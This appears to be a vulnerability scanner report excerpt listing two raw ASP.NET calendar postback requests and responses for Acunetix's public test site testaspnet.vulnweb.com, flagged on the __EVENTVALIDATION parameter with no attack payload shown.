Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8458&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAxZFVGNsIZGRkgl4xoWGFEVqF%2Bz%2FoAWkUjkAUNHc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLq5%2FPMDALRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJKl7u7sxqnJM3XJDL%2FFupvF6q3HU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:12 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAxZFVGNsIZGRkgl4xoWGFEVqF+z/oAWkUjkAUNHc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLq5/PMDALRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJKl7u7sxqnJM3XJDL/FupvF6q3HU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:White" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1177 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,177 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8579&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgCAwZ1qd9sIZGRk5qlpwkD4AGyFEDORXSyVQRIGzq0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLqg%2FWcAQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCi2jBOqEX3wLy8cWVBUhi1PwsJG3
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:05:19 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgCAwZ1qd9sIZGRk5qlpwkD4AGyFEDORXSyVQRIGzq0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLqg/WcAQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCi2jBOqEX3wLy8cWVBUhi1PwsJG3" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:White" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
